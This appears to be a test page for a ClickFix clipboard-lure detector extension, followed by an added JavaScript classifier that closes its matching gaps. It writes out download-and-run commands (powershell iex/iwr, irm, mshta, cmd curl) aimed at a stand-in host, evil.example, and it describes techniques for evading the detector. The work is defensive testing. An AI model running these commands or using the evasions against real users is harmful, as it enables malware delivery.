Load this file with the HEAT Shield extension installed and active. Each test below either bypasses the detector
(a malicious-looking string lands on the clipboard untouched) or causes a destructive false positive (the legitimate
page is redirected to blocked.html).
After running a bypass, paste into this textarea (Ctrl/⌘+V) or click “Read clipboard”. If the malicious string is present, the detector was bypassed.
navigator.clipboard.writeText() primary bypass
The detector listens only for synchronous copy/cut DOM events
and reads document.getSelection(). The async Clipboard API fires neither and
requires no selection. This is the dominant ClickFix pattern in the wild.
navigator.clipboard.writeText('powershell -nop -c "iex(iwr https://evil.example/x.ps1)"')
stopImmediatePropagation on copy bypass
The detector attaches with default (bubble) options on window. A page-attached
listener that runs first can cancel propagation before the detector ever sees the event.
-EncodedCommand hides the URL bypass
Regex #1 requires a literal http(s):// in the clipboard text. A base64-encoded
PowerShell command contains no literal URL, so the URL lookahead fails and the regex doesn’t match.
mshta bypass
Regex #1 is anchored to powershell/powershell.exe.
mshta, cmd /c curl, rundll32, regsvr32, wscript/cscript, and pwsh are all uncovered.
mshta https://evil.example/payload.hta
cmd /c curl bypass
cmd /c "curl -o %TEMP%\\a.exe https://evil.example/p.exe && %TEMP%\\a.exe"
irm without iex bypass
The regex matches iex/iwr but not irm.
This payload uses irm + -OutFile + ampersand-invoke and never says iex.
powershell -nop -c "irm https://evil.example/p.ps1 -OutFile $env:TEMP\\p.ps1; & \"$env:TEMP\\p.ps1\""
^\s*powershell bypass
Any character that isn’t whitespace before powershell kills the anchor.
Real ClickFix lures often include a leading comment line.
# Verify CAPTCHA — paste into Win+R powershell -nop -c "iex(iwr https://evil.example/x.ps1)"
about:blank child frame bypass
Manifest sets match_about_blank: false. A same-origin about:blank
child frame has no detector and can populate the parent’s clipboard via the Clipboard API.
Each button below uses a hidden textarea + execCommand('copy') with the listed,
real-world install command. The regex matches, the detector calls preventDefault(),
sends a threat-detected message, and the background worker redirects this tab to
blocked.html. That redirect is the false positive.
powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))"
powershell -Command "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://ohmyposh.dev/install.ps1'))"
powershell -Command "Invoke-WebRequest -Uri https://learn.microsoft.com/sample.ps1 -OutFile sample.ps1"
powershell -Command "iwr -Uri https://example.com/file.zip -OutFile C:\\Temp\\file.zip"
|) empty alternative FP
The flag list ends with |), an empty alternative. Combined with \b this
lets any -Word token satisfy the lookahead. So benign help text matches:
powershell -Help https://learn.microsoft.com/powershell
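Added example (not HEAT Shield's code, and not part of the original page): a line-oriented classifier that closes the string-matching gaps listed above (other launchers, -EncodedCommand, irm, leading text) without flagging the -Help string. It does not address the event-level bypasses; the verb list, the base64 length threshold and the function names are assumptions.

```javascript
// Added example, not HEAT Shield's code. Launcher names come from this page;
// the verb list and the 16-character base64 threshold are assumptions.
const LAUNCHER = /(?:^|[\s"'&|;(])(powershell|pwsh|mshta|cmd|rundll32|regsvr32|wscript|cscript)(?:\.exe)?(?=$|[\s"'])/i;
const HAS_URL = /https?:\/\/[^\s"')]+/i;
// Verbs that fetch or execute remote content, including irm and curl.
const FETCH = /\b(?:iex|iwr|irm|invoke-expression|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl)\b/i;
// Any -e... flag followed by a long base64 run
// (approximates -EncodedCommand and its abbreviations).
const ENCODED = /(?:^|\s)-e[a-z]*\s+[A-Za-z0-9+\/=]{16,}/i;
const SHELLS = new Set(['powershell', 'pwsh', 'cmd']);

// Returns 'encoded-command', 'remote-fetch', or null for one clipboard string.
function classify(text) {
  for (const line of String(text).split(/\r?\n/)) {
    // Unanchored search: leading text or a comment line does not hide the launcher.
    const m = LAUNCHER.exec(line);
    if (!m) continue;
    const shell = SHELLS.has(m[1].toLowerCase());
    if (shell && ENCODED.test(line)) return 'encoded-command';
    // Script hosts take a URL directly; shells need an explicit fetch verb,
    // so "powershell -Help https://..." is not flagged.
    if (HAS_URL.test(line) && (!shell || FETCH.test(line))) return 'remote-fetch';
  }
  return null;
}

// Strings from this page, plus a constructed -EncodedCommand sample
// (harmless constructed blob) and a constructed comment-line variant.
const SAMPLES = [
  ['powershell -nop -c "iex(iwr https://evil.example/x.ps1)"', 'remote-fetch'],
  ['mshta https://evil.example/payload.hta', 'remote-fetch'],
  ['cmd /c "curl -o %TEMP%\\a.exe https://evil.example/p.exe && %TEMP%\\a.exe"', 'remote-fetch'],
  [String.raw`powershell -nop -c "irm https://evil.example/p.ps1 -OutFile $env:TEMP\p.ps1; & \"$env:TEMP\p.ps1\""`, 'remote-fetch'],
  ['# Verify CAPTCHA\npowershell -nop -c "iex(iwr https://evil.example/x.ps1)"', 'remote-fetch'],
  ['powershell -nop -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgACcAaABpACcA', 'encoded-command'],
  ['powershell -Help https://learn.microsoft.com/powershell', null],
];

// One boolean per sample: true when classify() returns the expected label.
function runSamples() {
  return SAMPLES.map(([text, want]) => classify(text) === want);
}
```

The Chocolatey and Oh My Posh one-liners listed above still classify as remote-fetch, because as strings they have the same shape as a lure.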
If the detector is loaded and working, this should redirect the tab. Use it to confirm the extension is active before interpreting the bypasses above.
powershell -nop -c "iex(iwr https://evil.example/x.ps1)"
copy/cut on window (bubble phase).
document.getSelection().toString().
setData('text/plain','') + preventDefault() and dispatches onanalyse.threat-detected and navigates the tab to blocked.html.